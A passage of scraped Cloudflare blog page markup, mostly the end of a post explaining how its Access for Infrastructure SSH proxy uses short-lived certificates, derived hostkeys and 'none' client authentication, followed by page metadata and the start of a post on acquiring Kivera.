alt=\"\" class=\"kg-image\" width=\"1200\" height=\"628\" loading=\"lazy\"/>\n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-the-ssh-interception-works-under-the-hood\">How the SSH interception works under the hood</h2>\n <a href=\"#how-the-ssh-interception-works-under-the-hood\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <div class=\"flex anchor relative\">\n <h3 id=\"how-does-generic-ssh-work\">How does generic SSH work?</h3>\n <a href=\"#how-does-generic-ssh-work\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>To understand how Cloudflare’s SSH proxy works, we first must review how a generic SSH connection is established.</p><p>First off, SSH runs over TCP, so to establish an SSH connection, we first need to complete a TCP handshake. Then, once the TCP handshake is complete, an SSH key exchange is needed to establish an ephemeral symmetric key between the client and the server that will be used to encrypt and authenticate their SSH traffic. The SSH key exchange is based on the server public key, also known as the <i>hostkey. </i>If you’ve ever used SSH, you’ve probably seen this message — that is the SSH server telling your SSH client to trust this hostkey for all future SSH interactions. (This is also known as TOFU or Trust On First Use.)</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3rjmLTfw8CauXPT0kumYyw/7cbfe372a00f7c7b1f6957743113b20a/BLOG-2604_5.png\" alt=\"BLOG-2604 5\" class=\"kg-image\" width=\"1741\" height=\"215\" loading=\"lazy\"/>\n </figure><p>Finally, the client needs to authenticate itself to the server. This can be done using SSH passwords, SSH keys, or SSH certificates (as described above). SSH also has a mode called <i>none</i>, which means that the client does NOT need to authenticate itself to the server at all.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"so-how-does-cloudflares-ssh-proxy-work\">So how does Cloudflare’s SSH proxy work? </h3>\n <a href=\"#so-how-does-cloudflares-ssh-proxy-work\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6znMxrzjyakDF3KBqEWUHX/c12a50ef7ef6c77d4bbacaac3ee8ec60/BLOG-2604_6.png\" alt=\"BLOG-2604 6\" class=\"kg-image\" width=\"1312\" height=\"998\" loading=\"lazy\"/>\n </figure><p>To understand this, we note that whenever you set up SSH with Access for Infrastructure in the Cloudflare dashboard, you first need to create the set of targets (i.e. servers) that you want to make accessible via SSH. Targets can be defined by IP address or hostname. You then create an Access for Infrastructure application that captures the TCP ports (e.g. port 22) that SSH runs over for those targets, and write policies for those SSH connections, as we already described above and <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#5-add-an-infrastructure-application\"><u>in our developer documentation</u></a>.</p><p>This setup allows Cloudflare to know the set of IP addresses and ports for which it must intercept SSH traffic. Thus, whenever Cloudflare sees a TCP handshake with an IP address and port that must be intercepted, it sends traffic for that TCP connection to the SSH proxy. </p><p>The SSH proxy leverages the client’s already authenticated identity from the WARP client, and enforces the configured Access for Infrastructure policies against it. If the policies do not allow the identity to connect to the target under the requested Linux user (e.g. <i>root)</i>, the SSH proxy will reject the connection and log an <b><i>Access denied</i></b><b> </b>event to the Access logs. Otherwise, if policies do allow the identity to connect, the the SSH proxy will establish the following two SSH connections: </p><ol><li><p>SSH connection from SSH proxy to target</p></li><li><p>SSH connection from end user’s SSH client (via Cloudflare’s WARP client) to SSH proxy</p></li></ol><p>Let’s take a look at each of these SSH connections, and the cryptographic material used to set them up. </p><p><b>To establish the SSH connection from SSH proxy to the target</b>, the SSH proxy acts as a client in the SSH key exchange between itself and the target server. The handshake uses the target server’s <i>hostkey</i> to establish an ephemeral symmetric key between the client and the server that will encrypt and authenticate their SSH traffic. Next, the SSH proxy must authenticate itself to the target server. This is done by presenting the server with a short-lived SSH certificate, issued by the Cloudflare SSH CA, for the specified Linux user that is requested for this connection as we already described above. Because the target server has been configured to trust the Cloudflare SSH CA, the target server will be able to successfully validate the certificate and the SSH connection will be established.</p><p><b>To establish the SSH connection from the end-user&#39;s SSH client to SSH proxy</b>, the SSH proxy acts as a server in the SSH key exchange between itself and the end-user’s SSH client. </p><p>To do this, the SSH proxy needs to inform the end user’s SSH client about the <i>hostkey</i> that will be used to establish this connection. But what <i>hostkey</i> should be used? We cannot use the same <i>hostkey </i>used by the target server, because that <i>hostkey </i>is the public key that corresponds to a private key that is known only to the target server, and not known to the SSH proxy. So, Cloudflare’s SSH proxy needs to generate its own <i>hostkey</i>. We don’t want the end user to randomly see warnings like the one shown below, so the SSH proxy should provide the same <i>hostkey </i>each time the user wants to access a given target server. But, if something does change with the <i>hostkey </i>of the target server, we do want the warning below to be shown. </p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3VBYjkE9DOpN7A5IjLSN0H/bfbc9e3a65cb81abc6fe4eb5c5780b39/BLOG-2604_7.png\" alt=\"BLOG-2604 7\" class=\"kg-image\" width=\"1673\" height=\"425\" loading=\"lazy\"/>\n </figure><p>To achieve the desired behavior, the SSH proxy generates a <i>hostkey </i>and its corresponding private key by hashing together (a) a fixed secret value valid that associated with the customer account, along with (b) the <i>hostkey</i> that was provided by this target server (in the connection from SSH proxy to target server). This part of the design ensures that the end user only needs to see the TOFU notification the very first time it connects to the target server via WARP, because the same <i>hostkey</i> is used for all future connections to that target. And, if the <i>hostkey</i> of the target server does change as a result of a Monster-In-The-Middle attack, the warning above will be shown to the user.</p><p>Finally, during the SSH key exchange handshake from WARP client to SSH proxy, the SSH proxy informs that end user’s native SSH client that it is using <i>none</i> for client authentication. This means that the SSH client does NOT need to authenticate itself to the server at all. This part of the design ensures that the user need not enter any SSH passwords or store any SSH keys in its SSH configuration in order to connect to the target server via WARP. Also, this does not compromise security, because the SSH proxy has already authenticated the end user via Cloudflare’s WARP client and thus does not need to use the native SSH client authentication in the native SSH client.</p><p>Put this all together, and we have accomplished our goal of having end users authenticate to target servers without any SSH keys or passwords, using Cloudflare’s SSH CA instead. Moreover, we also preserve the desired behaviors of the TOFU notifications and warnings built into native SSH clients!</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"all-the-keys\">All the keys</h2>\n <a href=\"#all-the-keys\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Before we wrap up, let’s review the cryptographic keys you need in order to deploy SSH with Access for Infrastructure. There are two keys:</p><ol><li><p><b>Public key of the SSH CA. </b>The private key of the SSH CA is only known to Cloudflare and not shared with anyone. The public key of the <a href=\"https://ranbel-infrastructure-access.cloudflare-docs-7ou.pages.dev/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#generate-a-cloudflare-ssh-ca\"><u>SSH CA is obtained from the Cloudflare API</u></a> and must be <a href=\"https://ranbel-infrastructure-access.cloudflare-docs-7ou.pages.dev/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#generate-a-cloudflare-ssh-ca\"><u>installed</u></a> on all your target servers. The same public key is used for all of your targets. This public key does not need to be kept secret.</p></li><li><p><b>Private key for SSH command log encryption. </b>To obtain logs of SSH commands, you need to generate a <a href=\"https://ranbel-infrastructure-access.cloudflare-docs-7ou.pages.dev/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#generate-a-cloudflare-ssh-ca\"><u>public-private key pair, and upload the public key to Cloudflare</u></a>. The public key will be used to encrypt your SSH commands logs at REST. You need to keep the private key secret, and you can use it to <a href=\"https://ranbel-infrastructure-access.cloudflare-docs-7ou.pages.dev/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#view-ssh-logs\"><u>decrypt</u></a> your SSH command logs. </p></li></ol><p>That’s it! No other keys, passwords, or credentials to manage!</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"try-it-out-today\">Try it out today</h2>\n <a href=\"#try-it-out-today\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>At Cloudflare, we are committed to providing the most comprehensive solution for ZTNA, which now also includes privileged access to sensitive infrastructure like servers accessed over SSH.</p><p>Organizations can now treat SSH like any other Access application and enforce strong MFA, device context, and policy-based access prior to granting user access. This allows organizations to consolidate their infrastructure access policies into their broader SSE or SASE architecture.</p><p>You can try out Access for Infrastructure today by following <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#_top\"><u>these instructions in our developer documentation</u></a>. Access for Infrastructure is currently available free to teams of under 50 users, and at no extra cost to existing pay-as-you-go and Contract plan customers through an Access or Zero Trust subscription. Expect to hear about a lot more features from us as we continue to natively rebuild <a href=\"https://blog.cloudflare.com/cloudflare-acquires-bastionzero/\"><u>BastionZero</u></a>’s technology into Cloudflare’s Access for Infrastructure service!</p>"],"published_at":[0,"2024-10-23T14:00+01:00"],"updated_at":[0,"2024-11-22T18:50:38.763Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3sq4uvd8bFS9168WAhnxbJ/b8c7342c8bc376eeb97f407ae3447425/BLOG-2604_1.png"],"tags":[1,[[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"3QNaVNNpUXrfZYUGDJkXwA"],"name":[0,"Cloudflare Zero Trust"],"slug":[0,"cloudflare-zero-trust"]}],[0,{"id":[0,"013htAspXBEMdE76Afcyq2"],"name":[0,"Acquisitions"],"slug":[0,"acquisitions"]}],[0,{"id":[0,"64Z8wlRoBi6qbWfgdpgCJl"],"name":[0,"SSH"],"slug":[0,"ssh"]}],[0,{"id":[0,"6c9EM6c5poinGKIR6xldFo"],"name":[0,"Cloudflare Access"],"slug":[0,"cloudflare-access"]}],[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"6twWoAUd2y0j3cAMfKjwcW"],"name":[0,"Compliance"],"slug":[0,"compliance"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Sharon Goldberg"],"slug":[0,"goldbe"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6cKoimXGrudpdJuCAzYWGI/d84cd85760c1a34559532fc16f5f8d66/goldbe.png"],"location":[0,"Boston"],"website":[0,null],"twitter":[0,"@goldbe"],"facebook":[0,null]}],[0,{"name":[0,"Ann Ming Samborski"],"slug":[0,"ann-ming-samborski"],"bio":[0],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4K0P5wAoqGbOXiq1av6lQG/79f00a158601cad50455f23a261c6c7f/headshot-small.png"],"location":[0],"website":[0],"twitter":[0],"facebook":[0]}],[0,{"name":[0,"Sebby Lipman"],"slug":[0,"sebby-lipman"],"bio":[0],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1afMCOihEipPVGN5d4PuMQ/186f55217afeab10639f80c621d7e14e/WIN_20240610_13_33_05_Pro.jpg"],"location":[0],"website":[0],"twitter":[0],"facebook":[0]}]]],"meta_description":[0,"Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration.\n"],"primary_author":[0,{}],"localeList":[0,{"name":[0,"blog-english-only"],"enUS":[0,"English for Locale"],"zhCN":[0,"No Page for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"No Page for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"No Page for Locale"],"koKR":[0,"No Page for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/intro-access-for-infrastructure-ssh"],"metadata":[0,{"title":[0,"Fearless SSH: short-lived certificates bring Zero Trust to infrastructure"],"description":[0,"Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration.\n"],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3EsJXLKj5uJfANEOLZ5jF6/a5da7c34e4b316c2bd18f37b29148918/Fearless_SSH-_short-lived_certificates_bring_Zero_Trust_to_infrastructure-OG.png"]}]}],"translations":[0,{"posts.by":[0,"By"],"footer.gdpr":[0,"GDPR"],"lang_blurb1":[0,"This post is also available in {lang1}."],"lang_blurb2":[0,"This post is also available in {lang1} and {lang2}."],"lang_blurb3":[0,"This post is also available in {lang1}, {lang2} and {lang3}."],"footer.press":[0,"Press"],"header.title":[0,"The Cloudflare Blog"],"search.clear":[0,"Clear"],"search.filter":[0,"Filter"],"search.source":[0,"Source"],"footer.careers":[0,"Careers"],"footer.company":[0,"Company"],"footer.support":[0,"Support"],"footer.the_net":[0,"theNet"],"search.filters":[0,"Filters"],"footer.our_team":[0,"Our team"],"footer.webinars":[0,"Webinars"],"page.more_posts":[0,"More posts"],"posts.time_read":[0,"{time} min read"],"search.language":[0,"Language"],"footer.community":[0,"Community"],"footer.resources":[0,"Resources"],"footer.solutions":[0,"Solutions"],"footer.trademark":[0,"Trademark"],"header.subscribe":[0,"Subscribe"],"footer.compliance":[0,"Compliance"],"footer.free_plans":[0,"Free plans"],"footer.impact_ESG":[0,"Impact/ESG"],"posts.follow_on_X":[0,"Follow on X"],"footer.help_center":[0,"Help center"],"footer.network_map":[0,"Network Map"],"header.please_wait":[0,"Please Wait"],"page.related_posts":[0,"Related posts"],"search.result_stat":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong> for <strong>{search_keyword}</strong>"],"footer.case_studies":[0,"Case Studies"],"footer.connect_2024":[0,"Connect 2024"],"footer.terms_of_use":[0,"Terms of Use"],"footer.white_papers":[0,"White Papers"],"footer.cloudflare_tv":[0,"Cloudflare TV"],"footer.community_hub":[0,"Community Hub"],"footer.compare_plans":[0,"Compare plans"],"footer.contact_sales":[0,"Contact Sales"],"header.contact_sales":[0,"Contact Sales"],"header.email_address":[0,"Email Address"],"page.error.not_found":[0,"Page not found"],"footer.developer_docs":[0,"Developer docs"],"footer.privacy_policy":[0,"Privacy Policy"],"footer.request_a_demo":[0,"Request a demo"],"page.continue_reading":[0,"Continue reading"],"footer.analysts_report":[0,"Analyst reports"],"footer.for_enterprises":[0,"For enterprises"],"footer.getting_started":[0,"Getting Started"],"footer.learning_center":[0,"Learning Center"],"footer.project_galileo":[0,"Project Galileo"],"pagination.newer_posts":[0,"Newer Posts"],"pagination.older_posts":[0,"Older Posts"],"posts.social_buttons.x":[0,"Discuss on X"],"search.icon_aria_label":[0,"Search"],"search.source_location":[0,"Source/Location"],"footer.about_cloudflare":[0,"About Cloudflare"],"footer.athenian_project":[0,"Athenian Project"],"footer.become_a_partner":[0,"Become a partner"],"footer.cloudflare_radar":[0,"Cloudflare Radar"],"footer.network_services":[0,"Network services"],"footer.trust_and_safety":[0,"Trust & Safety"],"header.get_started_free":[0,"Get Started Free"],"page.search.placeholder":[0,"Search Cloudflare"],"footer.cloudflare_status":[0,"Cloudflare Status"],"footer.cookie_preference":[0,"Cookie Preferences"],"header.valid_email_error":[0,"Must be valid email."],"search.result_stat_empty":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong>"],"footer.connectivity_cloud":[0,"Connectivity cloud"],"footer.developer_services":[0,"Developer services"],"footer.investor_relations":[0,"Investor relations"],"page.not_found.error_code":[0,"Error Code: 404"],"search.autocomplete_title":[0,"Insert a query. Press enter to send"],"footer.logos_and_press_kit":[0,"Logos & press kit"],"footer.application_services":[0,"Application services"],"footer.get_a_recommendation":[0,"Get a recommendation"],"posts.social_buttons.reddit":[0,"Discuss on Reddit"],"footer.sse_and_sase_services":[0,"SSE and SASE services"],"page.not_found.outdated_link":[0,"You may have used an outdated link, or you may have typed the address incorrectly."],"footer.report_security_issues":[0,"Report Security Issues"],"page.error.error_message_page":[0,"Sorry, we can't find the page you are looking for."],"header.subscribe_notifications":[0,"Subscribe to receive notifications of new posts:"],"footer.cloudflare_for_campaigns":[0,"Cloudflare for Campaigns"],"header.subscription_confimation":[0,"Subscription confirmed. Thank you for subscribing!"],"posts.social_buttons.hackernews":[0,"Discuss on Hacker News"],"footer.diversity_equity_inclusion":[0,"Diversity, equity & inclusion"],"footer.critical_infrastructure_defense_project":[0,"Critical Infrastructure Defense Project"]}]}" ssr client="load" opts="{"name":"PostCard","value":true}" await-children> <article class="w-50-l mt4 mt2-l mb4 ph3 bb b--gray8 bn-l"> <div class="w-100"> <a href="https://blog-cloudflare-com.translate.goog/intro-access-for-infrastructure-ssh/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 no-underline gray1" data-testid="post-title"><h2 class="fw5 mt2">Fearless SSH: short-lived certificates bring Zero Trust to infrastructure</h2></a> <p class="f3 fw5 gray5 my" data-testid="post-date">2024-10-23</p> <div class=""> <a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Zero Trust</a><a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Cloudflare Zero Trust</a><a href="https://blog-cloudflare-com.translate.goog/tag/acquisitions/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Acquisitions</a><a href="https://blog-cloudflare-com.translate.goog/tag/ssh/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">SSH</a><a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-access/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Cloudflare Access</a><a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Cloudflare One</a><a href="https://blog-cloudflare-com.translate.goog/tag/compliance/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Compliance</a> </div> <p class="f3 fw4 gray1 lh-copy " data-testid="post-content">Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration. <!-- -->...</p> <ul class="author-lists flex pl0"> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/goldbe/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6cKoimXGrudpdJuCAzYWGI/d84cd85760c1a34559532fc16f5f8d66/goldbe.png" alt="Sharon Goldberg" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/goldbe/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Sharon Goldberg</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/ann-ming-samborski/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4K0P5wAoqGbOXiq1av6lQG/79f00a158601cad50455f23a261c6c7f/headshot-small.png" alt="Ann Ming Samborski" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/ann-ming-samborski/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Ann Ming Samborski</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/sebby-lipman/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1afMCOihEipPVGN5d4PuMQ/186f55217afeab10639f80c621d7e14e/WIN_20240610_13_33_05_Pro.jpg" alt="Sebby Lipman" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/sebby-lipman/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Sebby Lipman</a> </div></li> </ul> </div> </article><!--astro:end--> </astro-island><astro-island uid="Z12y6RM" prefix="r3" component-url="/_astro/PostCard.CG32ktie.js" component-export="PostCard" renderer-url="/_astro/client.DLO1yDVm.js" props="{"currentPage":[0,1],"isFeaturedImageFirstPost":[0,false],"post":[0,{"id":[0,"6e7vmGCa8tZRTNJWqYs1di"],"title":[0,"Cloudflare acquires Kivera to add simple, preventive cloud security to Cloudflare One "],"slug":[0,"cloudflare-acquires-kivera"],"excerpt":[0,"The acquisition and integration of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services. "],"featured":[0,false],"html":[0,"<p>We’re excited to announce that <a href=\"https://www.kivera.io/\"><u>Kivera</u></a>, a cloud security, data protection, and compliance company, has joined Cloudflare. This acquisition extends our SASE portfolio to incorporate inline cloud app controls, empowering <a href=\"https://www.cloudflare.com/zero-trust/\"><u>Cloudflare One</u></a> customers with preventative security controls for all their cloud services.</p><p>In today’s digital landscape, cloud services and SaaS (software as a service) apps have become indispensable for the daily operation of organizations. At the same time, the amount of data flowing between organizations and their cloud providers has ballooned, increasing the chances of data leakage, compliance issues, and worse, opportunities for attackers. Additionally, many companies — especially at enterprise scale — are working directly with multiple cloud providers for flexibility based on the strengths, resiliency against outages or errors, and cost efficiencies of different clouds. </p><p>Security teams that rely on <a href=\"https://www.cloudflare.com/learning/cloud/what-is-cspm/\"><u>Cloud Security Posture Management (CSPM)</u></a> or similar tools for monitoring cloud configurations and permissions and Infrastructure as code (IaC) scanning are falling short due to detecting issues only after misconfigurations occur with an overwhelming volume of alerts. The combination of Kivera and Cloudflare One puts preventive controls directly into the deployment process, or ‘inline’, blocking errors before they happen. This offers a proactive approach essential to protecting cloud infrastructure from evolving cyber threats, maintaining data security, and accelerating compliance. </p>\n <div class=\"flex anchor relative\">\n <h2 id=\"an-early-warning-system-for-cloud-security-risks\">An early warning system for cloud security risks </h2>\n <a href=\"#an-early-warning-system-for-cloud-security-risks\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 